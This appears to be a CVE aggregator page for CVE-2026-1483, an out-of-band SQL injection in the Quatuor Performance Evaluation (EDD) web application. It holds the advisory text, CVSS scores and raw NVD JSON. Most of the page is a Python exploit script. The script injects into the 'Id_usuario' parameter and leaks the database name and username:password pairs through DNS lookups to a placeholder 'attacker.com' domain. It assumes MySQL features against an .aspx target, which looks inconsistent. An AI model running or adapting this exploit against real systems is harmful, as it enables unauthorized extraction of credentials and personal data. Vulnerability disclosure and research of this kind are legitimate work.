CVE-2026-1483

Description

An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_ver_auto.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:* - VULNERABLE

Quatuor Performance Evaluation (EDD) application - 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-1483 OOB SQL Injection PoC
# Target: Quatuor Performance Evaluation (EDD) application
# Endpoint: /evaluacion_objetivos_ver_auto.aspx
# Vulnerable Parameter: Id_usuario

TARGET_URL = "http://target.com/evaluacion_objetivos_ver_auto.aspx"
ATTACKER_DOMAIN = "attacker.com"  # Attacker controlled DNS server

def extract_via_dns(payload, target_domain):
    """
    OOB SQL injection via DNS exfiltration
    The database will try to resolve the domain, leaking data in DNS queries
    """
    # Payload construction for MySQL/MariaDB
    # Using LOAD_FILE + UNC path for DNS exfiltration
    sql_payload = f"1' AND (SELECT LOAD_FILE(CONCAT('\\\\\\\\\\\\\\\\{payload}.{target_domain}\\\\\\test')))--"
    
    params = {
        'Id_usuario': sql_payload
    }
    
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10)
        return response.status_code
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

def extract_database_name():
    """
    Extract current database name via DNS exfiltration
    """
    payload = "(SELECT DATABASE())"
    print(f"[*] Extracting database name...")
    extract_via_dns(payload, ATTACKER_DOMAIN)

def extract_user_table():
    """
    Extract data from users table
    """
    payload = "(SELECT GROUP_CONCAT(username,0x3a,password) FROM users)"
    print(f"[*] Extracting user credentials...")
    extract_via_dns(payload, ATTACKER_DOMAIN)

def boolean_blind_check():
    """
    Verify vulnerability existence via boolean blind injection
    """
    # True condition - should return normal response
    true_payload = "1' AND 1=1--"
    # False condition - should return different response
    false_payload = "1' AND 1=2--"
    
    print("[*] Checking vulnerability with boolean blind test...")
    
    try:
        r1 = requests.get(TARGET_URL, params={'Id_usuario': true_payload})
        r2 = requests.get(TARGET_URL, params={'Id_usuario': false_payload})
        
        if r1.status_code != r2.status_code or r1.text != r2.text:
            print("[+] Vulnerability confirmed!")
            return True
        else:
            print("[-] Vulnerability check inconclusive")
            return False
    except Exception as e:
        print(f"[-] Error during check: {e}")
        return False

if __name__ == "__main__":
    print("=" * 50)
    print("CVE-2026-1483 OOB SQL Injection PoC")
    print("Target: Quatuor Performance Evaluation EDD App")
    print("=" * 50)
    
    if boolean_blind_check():
        print("\n[*] Starting data exfiltration via DNS...")
        extract_database_name()
        extract_user_table()
        print("\n[!] Check DNS logs on attacker server for leaked data")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1483
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1483
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1483/
[4] VulDB https://vuldb.com/cve/CVE-2026-1483
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1483", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:11.963", "lastModified": "2026-02-10T20:21:17.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_ver_auto.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL fuera de banda (OOB SQLi) ha sido detectada en la aplicación de Evaluación del Desempeño (EDD) desarrollada por Gabinete Técnico de Programación. La explotación de esta vulnerabilidad en el parámetro 'Id_usuario' en '/evaluacion_objetivos_ver_auto.aspx' podría permitir a un atacante extraer información sensible de la base de datos a través de canales externos, sin que la aplicación afectada devuelva los datos directamente, comprometiendo la confidencialidad de la información almacenada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*", "matchCriteriaId": "66ECBB1A-4822-4186-9C8B-49740C8B52A4"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}